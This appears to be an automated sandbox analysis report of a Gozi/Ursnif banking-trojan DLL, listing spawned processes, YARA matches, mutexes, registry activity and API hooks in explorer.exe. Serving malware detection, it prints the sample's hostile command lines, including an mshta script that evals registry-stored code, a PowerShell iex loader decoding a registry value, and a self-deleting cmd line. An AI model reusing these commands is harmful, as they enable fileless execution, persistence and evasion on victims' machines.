Source: C:\Windows\explorer.exe	Code function: 36_2_04DB7218
Source: C:\Windows\explorer.exe	Code function: 36_2_04DA2A34
Source: C:\Windows\explorer.exe	Code function: 36_2_04DA9A34
Source: C:\Windows\explorer.exe	Code function: 36_2_04DCE220
Source: C:\Windows\explorer.exe	Code function: 36_2_04DC93FC
Source: C:\Windows\explorer.exe	Code function: 36_2_04DC03EC
Source: C:\Windows\explorer.exe	Code function: 36_2_04DCA3B2
Source: C:\Windows\explorer.exe	Code function: 36_2_04DA7B44
Source: C:\Windows\explorer.exe	Code function: 36_2_04DBB378
Source: C:\Windows\explorer.exe	Code function: 36_2_04DC4B78
Source: C:\Windows\explorer.exe	Code function: 36_2_04DB6B00

Source: fcanujkk.dll.29.dr	Static PE information: No import functions for PE file found
Source: m5xmn43s.dll.32.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html

Source: classification engine

Classification label: mal100.bank.troj.evad.winDLL@43/151@17/2

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_05FAA7B1 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{53D6E16D-5C93-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{FA89DFE9-1191-3C17-6BCE-D530CFE2D964}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5112:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{6297719A-59AF-E450-F3B6-9D58D74A210C}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_01

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF0E355E1BD9BB118B.TMP

Jump to behavior

Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Virustotal: Detection: 33%
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	ReversingLabs: Detection: 25%

Source: regsvr32.exe

String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:82962 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:82970 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:17432 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES352.tmp' 'c:\Users\user\AppData\Local\Temp\fcanujkk\CSC3173F20A33D44EE3A49D2AFD78C0E6C5.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1BBC.tmp' 'c:\Users\user\AppData\Local\Temp\m5xmn43s\CSCBE8D23AB53C749FF947299C54732EF79.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:82962 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:82970 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:17432 /prefetch:2
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES352.tmp' 'c:\Users\user\AppData\Local\Temp\fcanujkk\CSC3173F20A33D44EE3A49D2AFD78C0E6C5.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1BBC.tmp' 'c:\Users\user\AppData\Local\Temp\m5xmn43s\CSCBE8D23AB53C749FF947299C54732EF79.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001D.00000002.925789248.000002946AE90000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.938527540.000001F33B7D0000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000002.1051265243.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: \fk.pdb$. source: powershell.exe, 0000001A.00000003.995503256.000001E7C3283000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.944587452.00000000064F0000.00000004.00000001.sdmp
Source:	Binary string: c:\climbThrough\Bedclear\ranCentury\Exercise.pdb source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.944587452.00000000064F0000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000024.00000002.1051265243.0000000005A00000.00000002.00000001.sdmp

Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.cmdline'

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_05FA95DC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: unknown

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FC6E10 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FC7177 push ecx; ret
Source: C:\Windows\explorer.exe	Code function: 36_2_04DCC131 push 3B000001h; retf

Source: initial sample

Static PE information: section name: .text entropy: 6.87784518477

Persistence and Installation Behavior:

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.860537429.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860574233.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860667381.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860601592.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860502446.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860680858.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.876294685.00000000059AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.938337595.0000000003320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860649674.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860628580.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6988, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Source: C:\Windows\explorer.exe

Registry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
